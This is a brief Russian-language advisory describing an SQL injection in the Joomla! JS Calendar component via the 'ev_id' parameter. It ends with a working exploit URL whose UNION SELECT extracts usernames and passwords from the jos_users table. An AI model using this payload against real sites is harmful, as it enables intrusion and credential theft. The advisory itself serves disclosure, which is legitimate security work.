Программа: Joomla! JS Calendar Component

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре "ev_id" (когда "option" установлен в "com_jscalendar",
"view" установлен в "jscalendar", и "task" установлен в "details"). Удаленный
пользователь может с помощью специально сформированного запроса выполнить
произвольные SQL команды в базе данных приложения.

Эксплоит:

http://site/path/index.php?option=com_jscalendar&view=jscalendar&task=
details&ev_id=999 UNION SELECT 1,username,password,4,5,6,7,8 FROM jos_users

Оставить мнение